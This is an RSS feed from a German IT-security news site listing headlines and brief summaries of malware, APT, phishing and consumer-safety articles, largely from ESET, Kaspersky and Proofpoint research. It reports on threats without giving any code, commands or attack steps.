<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - ⚠️ Malware / Trojaner / Viren]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/malware-trojaner-viren.xml]]></link>
<description><![CDATA[TSecurity.de bietet Ihnen einen Überblick über die neuesten Entwicklungen und Trends in der Welt der Malware, Trojaner, Viren und Cybersecurity. Hier finden Sie Informationen zu aktuellen Angriffen, Sicherheitslücken, Schutzmaßnahmen, Tools, Tipps und Ratschlägen von Experten. Außerdem können Sie sich mit anderen Nutzern austauschen, Fragen stellen und Erfahrungen teilen. TSecurity.de ist Ihr zuverlässiger Begleiter in der digitalen Welt.]]></description>
<language>de-DE</language>
<lastBuildDate>Sun, 26 Jul 2026 12:59:44 +0200</lastBuildDate>
<pubDate>Sun, 26 Jul 2026 12:59:44 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>⚠️ Malware / Trojaner / Viren</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - ⚠️ Malware / Trojaner / Viren]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/malware-trojaner-viren.xml]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/malware-trojaner-viren.xml" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Filme bei eBay verkaufen: Wenn die VHS-Sammlung zum Rechtsrisiko wird]]></title>
<description><![CDATA[VHS und DVDs online verkaufen: Was bei FSK 18, indizierten und beschlagnahmten Filmen rechtlich zu beachten ist.
Der Artikel Filme bei eBay verkaufen: Wenn die VHS-Sammlung zum Rechtsrisiko wird erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3695445/Nachrichtenportal/</link>
<pubDate>Sun, 26 Jul 2026 11:50:48 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>VHS und DVDs online verkaufen: Was bei FSK 18, indizierten und beschlagnahmten Filmen rechtlich zu beachten ist.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/rechtssachen/vhs-filme-bei-ebay-verkaufen-rechtsrisiko-331766.html">Filme bei eBay verkaufen: Wenn die VHS-Sammlung zum Rechtsrisiko wird</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The who, where, and how of APT attacks in Q2 2025–Q3 2025]]></title>
<description><![CDATA[ESET Chief Security Evangelist Tony Anscombe highlights some of the key findings from the latest issue of the ESET APT Activity Report]]></description>
<link>https://tsecurity.de/de/3694671/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:05:05 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ESET Chief Security Evangelist Tony Anscombe highlights some of the key findings from the latest issue of the ESET APT Activity Report]]></content:encoded>
</item>
<item>
<title><![CDATA[Why shadow AI could be your biggest security blind spot]]></title>
<description><![CDATA[From unintentional data leakage to buggy code, here’s why you should care about unsanctioned AI use in your company]]></description>
<link>https://tsecurity.de/de/3694670/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:05:00 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[From unintentional data leakage to buggy code, here’s why you should care about unsanctioned AI use in your company]]></content:encoded>
</item>
<item>
<title><![CDATA[How password managers can be hacked – and how to stay safe]]></title>
<description><![CDATA[Look no further to learn how cybercriminals could try to crack your vault and how you can keep your logins safe]]></description>
<link>https://tsecurity.de/de/3694669/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:58 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Look no further to learn how cybercriminals could try to crack your vault and how you can keep your logins safe]]></content:encoded>
</item>
<item>
<title><![CDATA[Influencers in the crosshairs: How cybercriminals are targeting content creators]]></title>
<description><![CDATA[Social media influencers can provide reach and trust for scams and malware distribution. Robust account protection is key to stopping the fraudsters.]]></description>
<link>https://tsecurity.de/de/3694667/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:57 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Social media influencers can provide reach and trust for scams and malware distribution. Robust account protection is key to stopping the fraudsters.]]></content:encoded>
</item>
<item>
<title><![CDATA[PlushDaemon compromises network devices for adversary-in-the-middle attacks]]></title>
<description><![CDATA[ESET researchers have discovered a network implant used by the China-aligned PlushDaemon APT group to perform adversary-in-the-middle attacks]]></description>
<link>https://tsecurity.de/de/3694668/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:57 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ESET researchers have discovered a network implant used by the China-aligned PlushDaemon APT group to perform adversary-in-the-middle attacks]]></content:encoded>
</item>
<item>
<title><![CDATA[MuddyWater: Snakes by the riverbank]]></title>
<description><![CDATA[MuddyWater targets critical infrastructure in Israel and Egypt, relying on custom malware, improved tactics, and a predictable playbook]]></description>
<link>https://tsecurity.de/de/3694665/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:56 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[MuddyWater targets critical infrastructure in Israel and Egypt, relying on custom malware, improved tactics, and a predictable playbook]]></content:encoded>
</item>
<item>
<title><![CDATA[This month in security with Tony Anscombe – November 2025 edition]]></title>
<description><![CDATA[Data exposure by top AI companies, the Akira ransomware haul, Operation Endgame against major malware families, and more of this month's cybersecurity news]]></description>
<link>https://tsecurity.de/de/3694666/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:56 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Data exposure by top AI companies, the Akira ransomware haul, Operation Endgame against major malware families, and more of this month's cybersecurity news]]></content:encoded>
</item>
<item>
<title><![CDATA[Phishing, privileges and passwords: Why identity is critical to improving cybersecurity posture]]></title>
<description><![CDATA[Identity is effectively the new network boundary. It must be protected at all costs.]]></description>
<link>https://tsecurity.de/de/3694664/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:55 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Identity is effectively the new network boundary. It must be protected at all costs.]]></content:encoded>
</item>
<item>
<title><![CDATA[Seeking symmetry during ATT&CK® season: How to harness today’s diverse analyst and tester landscape to paint a security masterpiece]]></title>
<description><![CDATA[Interpreting the vast cybersecurity vendor landscape through the lens of industry analysts and testing authorities can immensely enhance your cyber-resilience.]]></description>
<link>https://tsecurity.de/de/3694663/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:53 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Interpreting the vast cybersecurity vendor landscape through the lens of industry analysts and testing authorities can immensely enhance your cyber-resilience.]]></content:encoded>
</item>
<item>
<title><![CDATA[ESET Threat Report H2 2025]]></title>
<description><![CDATA[A view of the H2 2025 threat landscape as seen by ESET telemetry and from the perspective of ESET threat detection and research experts]]></description>
<link>https://tsecurity.de/de/3694662/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:52 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A view of the H2 2025 threat landscape as seen by ESET telemetry and from the perspective of ESET threat detection and research experts]]></content:encoded>
</item>
<item>
<title><![CDATA[LongNosedGoblin tries to sniff out governmental affairs in Southeast Asia and Japan]]></title>
<description><![CDATA[ESET researchers discovered a China-aligned APT group, LongNosedGoblin, which uses Group Policy to deploy cyberespionage tools across networks of governmental institutions]]></description>
<link>https://tsecurity.de/de/3694661/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:51 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ESET researchers discovered a China-aligned APT group, LongNosedGoblin, which uses Group Policy to deploy cyberespionage tools across networks of governmental institutions]]></content:encoded>
</item>
<item>
<title><![CDATA[This month in security with Tony Anscombe – December 2025 edition]]></title>
<description><![CDATA[As 2025 draws to a close, Tony looks back at the cybersecurity stories that stood out both in December and across the whole of this year]]></description>
<link>https://tsecurity.de/de/3694660/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:49 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[As 2025 draws to a close, Tony looks back at the cybersecurity stories that stood out both in December and across the whole of this year]]></content:encoded>
</item>
<item>
<title><![CDATA[Your personal information is on the dark web. What happens next?]]></title>
<description><![CDATA[If your data is on the dark web, it’s probably only a matter of time before it’s abused for fraud or account hijacking. Here’s what to do.]]></description>
<link>https://tsecurity.de/de/3694658/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:48 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[If your data is on the dark web, it’s probably only a matter of time before it’s abused for fraud or account hijacking. Here’s what to do.]]></content:encoded>
</item>
<item>
<title><![CDATA[Credential stuffing: What it is and how to protect yourself]]></title>
<description><![CDATA[Reusing passwords may feel like a harmless shortcut – until a single breach opens the door to multiple accounts]]></description>
<link>https://tsecurity.de/de/3694659/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:48 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Reusing passwords may feel like a harmless shortcut – until a single breach opens the door to multiple accounts]]></content:encoded>
</item>
<item>
<title><![CDATA[Common Apple Pay scams, and how to stay safe]]></title>
<description><![CDATA[Here’s how the most common scams targeting Apple Pay users work and what you can do to stay one step ahead]]></description>
<link>https://tsecurity.de/de/3694657/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:44 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Here’s how the most common scams targeting Apple Pay users work and what you can do to stay one step ahead]]></content:encoded>
</item>
<item>
<title><![CDATA[Children and chatbots: What parents should know]]></title>
<description><![CDATA[As children turn to AI chatbots for answers, advice, and companionship, questions emerge about their safety, privacy, and emotional development]]></description>
<link>https://tsecurity.de/de/3694656/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:42 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[As children turn to AI chatbots for answers, advice, and companionship, questions emerge about their safety, privacy, and emotional development]]></content:encoded>
</item>
<item>
<title><![CDATA[ESET Research: Sandworm behind cyberattack on Poland’s power grid in late 2025]]></title>
<description><![CDATA[The attack involved data-wiping malware that ESET researchers have now analyzed and named DynoWiper]]></description>
<link>https://tsecurity.de/de/3694655/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:39 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The attack involved data-wiping malware that ESET researchers have now analyzed and named DynoWiper]]></content:encoded>
</item>
<item>
<title><![CDATA[How SMBs use threat research and MDR to build a defensive edge]]></title>
<description><![CDATA[We speak to Director of ESET Threat Research Jean-Ian Boutin about where solutions that blend advanced technology with human expertise provide the most practical value for businesses]]></description>
<link>https://tsecurity.de/de/3694653/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:38 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[We speak to Director of ESET Threat Research Jean-Ian Boutin about where solutions that blend advanced technology with human expertise provide the most practical value for businesses]]></content:encoded>
</item>
<item>
<title><![CDATA[Protecting education: How MDR can tip the balance in favor of schools]]></title>
<description><![CDATA[The education sector is notoriously short on cash, but rich in assets for threat actors to target. How can managed detection and response (MDR) help learning institutions regain the initiative?]]></description>
<link>https://tsecurity.de/de/3694654/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:38 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The education sector is notoriously short on cash, but rich in assets for threat actors to target. How can managed detection and response (MDR) help learning institutions regain the initiative?]]></content:encoded>
</item>
<item>
<title><![CDATA[Move fast and save things: A quick guide to recovering a hacked account]]></title>
<description><![CDATA[What you do – and how fast – after an account is compromised often matters more than it may seem]]></description>
<link>https://tsecurity.de/de/3694652/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:37 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[What you do – and how fast – after an account is compromised often matters more than it may seem]]></content:encoded>
</item>
<item>
<title><![CDATA[The quest for greater tech independence]]></title>
<description><![CDATA[A complete decoupling from US technology is neither realistic nor necessary, but the changing environment does require nations and companies to reassess their relationships and dependencies]]></description>
<link>https://tsecurity.de/de/3694650/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:35 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A complete decoupling from US technology is neither realistic nor necessary, but the changing environment does require nations and companies to reassess their relationships and dependencies]]></content:encoded>
</item>
<item>
<title><![CDATA[That data breach alert might be a trap]]></title>
<description><![CDATA[Ignoring a real breach notification invites risk, but falling for a bogus one could be even worse. Stop reacting on autopilot.]]></description>
<link>https://tsecurity.de/de/3694651/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:35 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ignoring a real breach notification invites risk, but falling for a bogus one could be even worse. Stop reacting on autopilot.]]></content:encoded>
</item>
<item>
<title><![CDATA[BTMOB: A stealthy RAT burrowing deep into Android devices]]></title>
<description><![CDATA[The malware pairs remote access capabilities with ready-made campaign tools, lowering the barrier for full device compromise]]></description>
<link>https://tsecurity.de/de/3694648/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:34 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The malware pairs remote access capabilities with ready-made campaign tools, lowering the barrier for full device compromise]]></content:encoded>
</item>
<item>
<title><![CDATA[Webworm: New burrowing techniques]]></title>
<description><![CDATA[ESET researchers describe new tools and techniques that the Webworm APT group recently added to its arsenal]]></description>
<link>https://tsecurity.de/de/3694649/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:34 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ESET researchers describe new tools and techniques that the Webworm APT group recently added to its arsenal]]></content:encoded>
</item>
<item>
<title><![CDATA[Lessons for life: Why children’s data is a long-term identity risk]]></title>
<description><![CDATA[Your child’s first data breach may happen before they’ve even opened a bank account. Here’s how to keep their digital life safe.]]></description>
<link>https://tsecurity.de/de/3694646/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:33 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Your child’s first data breach may happen before they’ve even opened a bank account. Here’s how to keep their digital life safe.]]></content:encoded>
</item>
<item>
<title><![CDATA[This month in security with Tony Anscombe – May 2026 edition]]></title>
<description><![CDATA[In this roundup, Tony looks at attacks against Polish water treatment facilities, how AI-directed attacks failed in Mexico, and what Google believes is the first AI-generated zero-day exploit]]></description>
<link>https://tsecurity.de/de/3694647/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:33 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In this roundup, Tony looks at attacks against Polish water treatment facilities, how AI-directed attacks failed in Mexico, and what Google believes is the first AI-generated zero-day exploit]]></content:encoded>
</item>
<item>
<title><![CDATA[Unpacking SMB cyber-readiness – and what makes or breaks it]]></title>
<description><![CDATA[A company that's expecting a cyberattack but hasn’t actively prepared for it risks making the hardest decisions at the worst possible moment]]></description>
<link>https://tsecurity.de/de/3694645/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:32 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A company that's expecting a cyberattack but hasn’t actively prepared for it risks making the hardest decisions at the worst possible moment]]></content:encoded>
</item>
<item>
<title><![CDATA[EvilTokens: A phishing attack that doesn’t steal your password]]></title>
<description><![CDATA[A phishing kit subverting Microsoft’s legitimate authentication flow lets attackers break into accounts without stealing passwords or creating fake login pages]]></description>
<link>https://tsecurity.de/de/3694643/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:31 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A phishing kit subverting Microsoft’s legitimate authentication flow lets attackers break into accounts without stealing passwords or creating fake login pages]]></content:encoded>
</item>
<item>
<title><![CDATA[OceanLotus: From external espionage to domestic targeting]]></title>
<description><![CDATA[A shift in operational pattern of the infamous Vietnam-aligned APT group]]></description>
<link>https://tsecurity.de/de/3694644/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:31 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A shift in operational pattern of the infamous Vietnam-aligned APT group]]></content:encoded>
</item>
<item>
<title><![CDATA[Inside the inbox: Why cybercriminals want to break into your email account]]></title>
<description><![CDATA[Your inbox is an identity system all of its own: whoever owns it may own a lot more]]></description>
<link>https://tsecurity.de/de/3694641/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:30 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Your inbox is an identity system all of its own: whoever owns it may own a lot more]]></content:encoded>
</item>
<item>
<title><![CDATA[ESET takes part in Operation Endgame to disrupt Amadey and Stealc]]></title>
<description><![CDATA[ESET researchers assisted in the global disruption of the Amadey botnet and Stealc infostealer, providing technical analysis, infrastructure tracking, and affiliate-level insights]]></description>
<link>https://tsecurity.de/de/3694642/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:30 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ESET researchers assisted in the global disruption of the Amadey botnet and Stealc infostealer, providing technical analysis, infrastructure tracking, and affiliate-level insights]]></content:encoded>
</item>
<item>
<title><![CDATA[Top 10 Most Dangerous AI Tools Used By Hackers In 2024 (INTEL-AS-A-WEAPON)]]></title>
<description><![CDATA[YouTube Video]]></description>
<link>https://tsecurity.de/de/3694640/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:29 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>YouTube Video</p><p><iframe loading="lazy" src="https://www.youtube.com/embed/Y49CmATRggg"></iframe></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Threat landscape for industrial automation systems. Q1 2026]]></title>
<description><![CDATA[This report contains industrial threat statistics for Q1 2026, including industrial threat distribution by type, source, region and industry.]]></description>
<link>https://tsecurity.de/de/3694638/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:17 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This report contains industrial threat statistics for Q1 2026, including industrial threat distribution by type, source, region and industry.]]></content:encoded>
</item>
<item>
<title><![CDATA[Armored Likho digging a snake pit: inside the covert BusySnake Stealer campaign]]></title>
<description><![CDATA[An inside look at the active Armored Likho APT campaign. The attackers are using spear-phishing, AI-generated loaders, and a new Python-based tool, BusySnake Stealer, to target organizations in Russia, Kazakhstan, and Brazil.]]></description>
<link>https://tsecurity.de/de/3694639/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:17 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An inside look at the active Armored Likho APT campaign. The attackers are using spear-phishing, AI-generated loaders, and a new Python-based tool, BusySnake Stealer, to target organizations in Russia, Kazakhstan, and Brazil.]]></content:encoded>
</item>
<item>
<title><![CDATA[New Project CAV3RN module abuses Outlook calendar events for C2 and DNS AAAA records for configuration recovery]]></title>
<description><![CDATA[Kaspersky GReAT experts describe a new Project CAV3RN C2 module. It uses Outlook calendar for communication via Microsoft Graph and has a backup connection via DNS AAAA responses.]]></description>
<link>https://tsecurity.de/de/3694635/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:16 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kaspersky GReAT experts describe a new Project CAV3RN C2 module. It uses Outlook calendar for communication via Microsoft Graph and has a backup connection via DNS AAAA responses.]]></content:encoded>
</item>
<item>
<title><![CDATA[GoSerpent: a persistent threat evolves with sophisticated data collection and exfiltration]]></title>
<description><![CDATA[Two-phase attacks with the GoSerpent backdoor, Stowaway RAT, ThumbcacheService and other tools aim to steal data from government entities in Southeast Asia.]]></description>
<link>https://tsecurity.de/de/3694636/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:16 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Two-phase attacks with the GoSerpent backdoor, Stowaway RAT, ThumbcacheService and other tools aim to steal data from government entities in Southeast Asia.]]></content:encoded>
</item>
<item>
<title><![CDATA[OkoBot: new sophisticated malware framework targets cryptocurrency users]]></title>
<description><![CDATA[Kaspersky GReAT experts dissect the new OkoBot campaign targeting cryptocurrency users. This complex framework employs TookPS, exfiltrates seed phrases, monitors Chromium-based browsers, and installs various malware strains, including the Rilide stealer.]]></description>
<link>https://tsecurity.de/de/3694637/Nachrichtenportal/</link>
<pubDate>Sat, 25 Jul 2026 19:04:16 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kaspersky GReAT experts dissect the new OkoBot campaign targeting cryptocurrency users. This complex framework employs TookPS, exfiltrates seed phrases, monitors Chromium-based browsers, and installs various malware strains, including the Rilide stealer.]]></content:encoded>
</item>
<item>
<title><![CDATA[99 % Raubkopierer: Anti-Piraterie-Gag sorgt für Verkaufsexplosion]]></title>
<description><![CDATA[99 % Raubkopierer: Ein Indie-Entwickler wird mit einem Anti-Piraterie-Gag viral – bis die Realität ihn einholt.
Der Artikel 99 % Raubkopierer: Anti-Piraterie-Gag sorgt für Verkaufsexplosion erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3692218/it+sicherheit/malware+trojaner+viren/99+raubkopierer+anti-piraterie-gag+sorgt+fuer+verkaufsexplosion/</link>
<pubDate>Fri, 24 Jul 2026 19:51:10 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>99 % Raubkopierer: Ein Indie-Entwickler wird mit einem Anti-Piraterie-Gag viral – bis die Realität ihn einholt.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/gaming/99-prozent-raubkopierer-anti-piraterie-gag-verkaufsexplosion-331756.html">99 % Raubkopierer: Anti-Piraterie-Gag sorgt für Verkaufsexplosion</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TA488 Targets Zimbra Mailservers with Half-Click Exploits]]></title>
<description><![CDATA[2026-07-23 • Proofpoint
     • Greg Lesnewich, Konstantin Klinger, Mark Kelly, Nick Attfield, Saher Naumaan
     • js.zimreaper
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3691729/it+sicherheit/malware+trojaner+viren/ta488+targets+zimbra+mailservers+with+half-click+exploits/</link>
<pubDate>Fri, 24 Jul 2026 15:57:49 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-23 • Proofpoint
     • Greg Lesnewich, Konstantin Klinger, Mark Kelly, Nick Attfield, Saher Naumaan
     • js.zimreaper
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/ac65e9d1-1b9c-4b00-bc82-b9dff4fbe0ee/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Operation RoundPress Rolls on with More Half-Click Webmail Zero-Days from TA458]]></title>
<description><![CDATA[2026-07-23 • Proofpoint
     • Greg Lesnewich, Konstantin Klinger, Mark Kelly, Nick Attfield, Saher Naumaan
     • js.spypress
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3691728/it+sicherheit/malware+trojaner+viren/operation+roundpress+rolls+on+with+more+half-click+webmail+zero-days+from+ta458/</link>
<pubDate>Fri, 24 Jul 2026 15:57:40 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-23 • Proofpoint
     • Greg Lesnewich, Konstantin Klinger, Mark Kelly, Nick Attfield, Saher Naumaan
     • js.spypress
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/e20a8ecb-9634-413c-bd30-90d6852d9287/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[NSA and Partners Alert Zimbra Collaboration Suite Users of a Russian State-Supported Phishing Campaign]]></title>
<description><![CDATA[2026-07-23 • NSA
     • NSA
     • js.zimreaper
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3691727/it+sicherheit/malware+trojaner+viren/nsa+and+partners+alert+zimbra+collaboration+suite+users+of+a+russian+state-supported+phishing+campaign/</link>
<pubDate>Fri, 24 Jul 2026 15:57:39 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-23 • NSA
     • NSA
     • js.zimreaper
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/eefd30b9-7cf8-477b-93a8-6567041830cb/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Inside FakeAgent: How a Claude Desktop Malvertising Campaign Hit 29 Organizations with SectopRAT]]></title>
<description><![CDATA[2026-07-22 • Huntress Labs
     • Michael Tigges
     • win.sectop_rat
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3691695/it+sicherheit/malware+trojaner+viren/inside+fakeagent+how+a+claude+desktop+malvertising+campaign+hit+29+organizations+with+sectoprat/</link>
<pubDate>Fri, 24 Jul 2026 15:34:22 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-22 • Huntress Labs
     • Michael Tigges
     • win.sectop_rat
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/e557c4f6-4711-4e3b-b09e-096db29e9091/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[EtherHiding Malware on macOS: How Attackers Hide C2 on the Blockchain]]></title>
<description><![CDATA[2026-07-22 • Prophet Security
